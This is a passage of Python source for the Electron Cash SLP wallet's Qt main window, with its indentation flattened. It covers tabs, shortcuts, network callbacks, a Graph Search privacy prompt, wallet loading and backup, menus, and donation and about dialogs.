# this is because lazy-loading it from within Python
# callbacks led to crashes on Linux, likely due to
# bugs in PyQt5 (crashes wouldn't happen when testing
# with PySide2!).
from PyQt5.QtMultimedia import QCameraInfo
del QCameraInfo # defensive programming: not always available so don't keep name around
except ImportError as e:
pass # we tried to pre-load it, failure is ok; camera just won't be available
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
cashaddr_toggled_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
status_icon_dict = dict() # app-globel cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
self.config = config = gui_object.config
self.non_slp_wallet_warning_shown = False
self.force_use_single_change_addr = _('Change addresses behavior is not customizable for SLP wallets') if self.is_slp_wallet else False
if self.force_use_single_change_addr and not self.wallet.use_change:
self.wallet.use_change = True
self.wallet.storage.put('use_change', self.wallet.use_change)
self.network = gui_object.daemon.network
self.network.slp_validity_signal = self.gui_object.slp_validity_signal
self.network.slp_validation_fetch_signal = self.gui_object.slp_validation_fetch_signal
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self._slp_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self._shortcuts = Weak.Set() # keep track of shortcuts and disable them on close
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.slp_mgt_tab = self.create_slp_mgt_tab()
self.converter_tab = self.create_converter_tab()
self.slp_history_tab = self.create_slp_history_tab()
self.slp_token_id = None
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
if self.is_slp_wallet:
add_optional_tab(tabs, self.slp_mgt_tab, QIcon(":icons/tab_slp_icon.png"), _("Tokens"), "tokens")
add_optional_tab(tabs, self.slp_history_tab, QIcon(":icons/tab_slp_icon.png"), _("SLP History"), "slp_history", True)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak.ref(tabs) # We use a weak reference here to help along python gc of QShortcut children: prevent the lambdas below from holding a strong ref to self.
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+W"), self, self.close) )
# Below is now addded to the menu as Ctrl+R but we'll also support F5 like browsers do
self._shortcuts.add( QShortcut(QKeySequence("F5"), self, self.update_wallet) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() - 1)%wrtabs().count())) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() + 1)%wrtabs().count())) )
for i in range(tabs.count()):
self._shortcuts.add( QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs() and wrtabs().setCurrentIndex(i)) )
self.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
self.slp_history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet()
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
self.gui_object.slp_validation_fetch_signal.connect(self.slp_validation_fetch_slot, Qt.QueuedConnection)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
@property
def is_slp_wallet(self):
return self.wallet.is_slp
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
# do this immediately after this event handler finishes -- noop on everything but linux
QTimer.singleShot(0, lambda: weakSelf() and weakSelf().gui_object.lin_win_maybe_show_highdpi_caveat_msg(weakSelf()))
def update_token_type_combo(self):
self.token_type_combo.clear()
self.receive_token_type_combo.clear()
self.token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
try:
token_types = self.wallet.token_types
except AttributeError:
pass
else:
sorted_items = sorted(token_types.items(), key=lambda x:x[1]['name'])
for token_id, i in sorted_items:
if i['decimals'] != '?':
self.token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab, forceStatus = 0):
# forceStatus = 0 , do nothing
# forceStatus = 1 , force Show
# forceStatus = 2 , force hide
if forceStatus==1:
show=True
elif forceStatus==2:
show=False
else:
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window, *, raise_if_missing=False):
try:
self.tl_windows.remove(window)
except ValueError:
if raise_if_missing:
raise
''' Window not in list. Suppressing the exception by default makes
writing cleanup handlers easier. Doing it this way fixes #1707. '''
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
_gs_option_shown = False
_high_data_limit = 1048576 * 100 # 100 MB limit
_high_data_shown = False
def slp_validation_fetch_slot(self, total_bytes_received):
key = 'slp_validator_graphsearch_enabled'
key2 = 'slp_validator_gs_did_nag_once_even_if_was_false'
key3 = 'slp_never_warn_on_high_data'
val, val2, val3 = self.config.get(key), self.config.get(key2), self.config.get(key3)
# This if conditional asks once app-wide. But it only asks if:
# - "gs enabled" key has never been configured (is None)
# *or*
# - "gs enabled" key is False (indicating user configured it to False)
# but it never asked before (we nag the user at least once even if off,
# basically).
if (not ElectrumWindow._gs_option_shown
and (val is None or (val is False and not val2))):
del val, val2
ElectrumWindow._gs_option_shown = True
self.config.set_key(key2, True) # turn off forced "ask at least once" mechanism
res, neverask_chk = self.question(
_("Speed up SLP validation using a Graph Search server?"),
title=_("SLP Graph Search"),
detail_text=_(
"SLP validation can use a Graph Search server, making it"
" blazingly fast. This does, however, mean that your client"
" contacts an additional server on the internet, sharing"
" with it a set of txids you are interested in knowing"
" more about.\n\n"
"Some extremely privacy-minded users may opt out of this"
" speedy facility in light of that fact, and choose to use"
" the older, slower method of simply relying on the"
" ElectronX servers to do SLP token validation.\n\n"
"If unsure what to answer now, you may always toggle this"
" facility on/off from the Network Dialog later."),
checkbox_text=_("Don't ask again"))
if res:
self.config.set_key(key, True)
elif neverask_chk:
# set to actual False rather than None to indicate we never
# want to be asked.
self.config.set_key(key, False)
elif (val3 is None or val3 is False) \
and total_bytes_received >= ElectrumWindow._high_data_limit \
and not ElectrumWindow._high_data_shown:
ElectrumWindow._high_data_shown = True
res, neverask_chk = self.question(
_("SLP Graph Search has downloaded 100 MB in data and will continue to download data."
"Disabling Graph Search would slow down the rate of downloading.\n\n"
"Continue using SLP Graph Search?"),
title=_("High Data Usage"),
detail_text=_(
"SLP validation can use a Graph Search server, making it"
" blazingly fast. This does, however, mean that your client"
" uses additional data and bandwidth to download"
" all of the transactions it needs to validate your tokens.\n\n"
"Disabling Graph Search will reduce the speed of "
"If unsure what to answer now, you may always toggle this"
" facility on/off from the Network Dialog later."),
checkbox_text=_("Don't ask again")
)
# TODO: This message should also be displayed based on ElectrumX validation data downloaded
if res is False:
self.config.set_key(key, False)
if neverask_chk:
# set to actual False rather than None to indicate we never
# want to be asked.
self.config.set_key(key3, True)
def load_wallet(self):
self.wallet.thread = TaskThread(self, self.on_error, name = self.wallet.diagnostic_name() + '/Wallet')
self.wallet.ui_emit_validity_updated = self.gui_object.slp_validity_signal.emit
self.wallet.ui_emit_validation_fetch = self.gui_object.slp_validation_fetch_signal.emit
self.update_recently_visited(self.wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.update_token_type_combo()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
if self.is_slp_wallet:
self.toggle_cashaddr(2, True)
self.toggle_tab(self.slp_mgt_tab, 1)
self.toggle_tab(self.slp_history_tab, 1)
else:
self.toggle_cashaddr(1, True)
self.update_receive_address_widget()
self.address_list.update()
self.utxo_list.update()
self.slp_mgt_tab.update()
self.slp_history_tab.update()
self.update_cashaddr_icon()
run_hook('load_wallet', self.wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def _warn_slp_prefers_slp_wallets_if_not_slp_wallet(self):
if not self.is_slp_wallet and not self.non_slp_wallet_warning_shown:
msg = '\n\n'.join([
_("WARNING: SLP Tokens Disabled."),
_("SLP tokens were detected in this older style wallet file and this version does not allow use of SLP tokens for your protection."),
_("Please install version 3.4.6 to create a new SLP wallet file and then transfer the tokens from this wallet file to the new 3.4.6 style wallet file."),
_("Why? This is because Electron Cash SLP versions 3.4.3 and later all include a significant security improvement for SLP tokens. That is, all standard wallet files created with 3.4.3 and later use BIP-44 key derivation path m/44'/245' to reduce the risk of burning SLP tokens. Taking no action could result in burning your tokens if this wallet's seed is imported into a non-SLP aware wallet."),
_('''If you're wondering "what do I have to do?":'''),
_("If you want to recover the SLP tokens in this wallet file you need to install version 3.4.6 of this software and follow the instructions provided above.")
])
self.show_warning(msg, title=_("SLP Tokens Detected in a Non-SLP Wallet"))
self.non_slp_wallet_warning_shown = True
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
destroyed_print_error(menubar)
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("Open &Recent"))
file_menu.addAction(_("&Open") + "...", self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore") + "...", self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy As") + "...", self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("&Delete") + "...", self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close).setShortcut(QKeySequence.Quit)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys, QKeySequence("Ctrl+I"))
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password") + "...", self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("Private Keys"))
self.private_keys_menu.addAction(_("&Sweep") + "...", self.sweep_key_dialog).setDisabled(True) # always disable in SLP for now
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import") + "...", self.do_import_privkey)
self.export_menu = self.private_keys_menu.addMenu(_("&Export"))
self.export_menu.addAction(_("&WIF Plaintext") + "...", self.export_privkeys_dialog)
self.export_menu.addAction(_("&BIP38 Encrypted") + "...", self.export_bip38_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses") + "...", self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild History") + "...", self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("Scan &More Addresses..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import") + "...", self.do_import_labels)
labels_menu.addAction(_("&Export") + "...", self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("&Contacts"))
contacts_menu.addAction(_("&New") + "...", self.new_contact_dialog)
contacts_menu.addAction(_("Import") + "...", lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export") + "...", lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import") + "...", lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export") + "...", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("&Find"), self.toggle_search, QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Refresh GUI"), self.update_wallet, QKeySequence("Ctrl+R"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
if self.is_slp_wallet:
add_toggle_action(view_menu, self.slp_mgt_tab)
add_toggle_action(view_menu, self.slp_history_tab)
tools_menu = menubar.addMenu(_("&Tools"))
prefs_tit = _("Preferences") + "..."
a = tools_menu.addAction(prefs_tit, self.settings_dialog, QKeySequence("Ctrl+,") ) # Note: on macOS this hotkey sequence won't be shown in the menu (since it's reserved by the system), but will still work. :/
if sys.platform == 'darwin':
# This turns off the heuristic matching based on name and keeps the
# "Preferences" action out of the application menu and into the
# actual menu we specified on macOS.
a.setMenuRole(QAction.NoRole)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network") + "...", lambda: gui_object.show_network_dialog(weakSelf()), QKeySequence("Ctrl+K"))
tools_menu.addAction(_("Optional &Features") + "...", self.internal_plugins_dialog, QKeySequence("Shift+Ctrl+P"))
tools_menu.addAction(_("Installed &Plugins") + "...", self.external_plugins_dialog, QKeySequence("Ctrl+P"))
if sys.platform in ('linux', 'linux2', 'linux3'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware Wallet Support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/Verify Message") + "...", self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/Decrypt Message") + "...", self.encrypt_message)
tools_menu.addSeparator()
tools_menu.addAction(_("Upload a file using BFP"), lambda: BitcoinFilesUploadDialog(self, None, True, "Upload a File Using BFP"))
tools_menu.addAction(_("Download a file using BFP"), lambda: BfpDownloadFileDialog(self,))
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to Many"), self.paytomany, QKeySequence("Ctrl+M"))
raw_transaction_menu = tools_menu.addMenu(_("&Load Transaction"))
raw_transaction_menu.addAction(_("From &File") + "...", self.do_process_from_file)
raw_transaction_menu.addAction(_("From &Text") + "...", self.do_process_from_text, QKeySequence("Ctrl+T"))
raw_transaction_menu.addAction(_("From the &Blockchain") + "...", self.do_process_from_txid, QKeySequence("Ctrl+B"))
raw_transaction_menu.addAction(_("From &QR Code") + "...", self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("About Qt"), self.app.aboutQt)
help_menu.addAction(_("&Check for Updates"), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official Website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug..."), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to Server") + "...", self.donate_to_server)
def donate_to_server(self):
if self.gui_object.warn_if_no_network(self):
return
d = {}
spv_address = self.network.get_donation_address()
spv_prefix = _("Blockchain Server")
donation_for = _("Donation for")
if spv_address:
host = self.network.get_parameters()[0]
d[spv_prefix + ": " + host] = spv_address
plugin_servers = run_hook('donation_address', self, multi=True)
for tup in plugin_servers:
if not isinstance(tup, (list, tuple)) or len(tup) != 2:
continue
desc, address = tup
if (desc and address and isinstance(desc, str) and isinstance(address, Address)
and desc not in d and not desc.lower().startswith(spv_prefix.lower())):
d[desc] = address.to_ui_string()
def do_payto(desc):
addr = d[desc]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{pre}:{addr}?message={donation_for} {desc}'
.format(pre = networks.net.CASHADDR_PREFIX,
addr = addr,
donation_for = donation_for,
desc = desc))
if len(d) == 1:
do_payto(next(iter(d.keys())))
elif len(d) > 1:
choices = tuple(d.keys())
index = self.query_choice(_('Please select which server you would like to donate to:'), choices, add_cancel_button = True)
if index is not None:
do_payto(choices[index])
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash SLP",
"<p><font size=+3><b>Electron Cash SLP</b></font></p><p>" + _("Version") + f" {self.wallet.electrum_version}" + "</p>" +
'<p><span style="font-size:11pt; font-weight:500;">' + "Copyright © 2017-2019<br>Electron Cash LLC & The Electron Cash Developers" + "</span></p>" +
'<p><span style="font-weight:200;">' +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system.") +
"</span></p>"
)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=https://github.com/simpleledger/Electron-Cash-SLP/issues>https://github.com/simpleledger/Electron-Cash-SLP/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
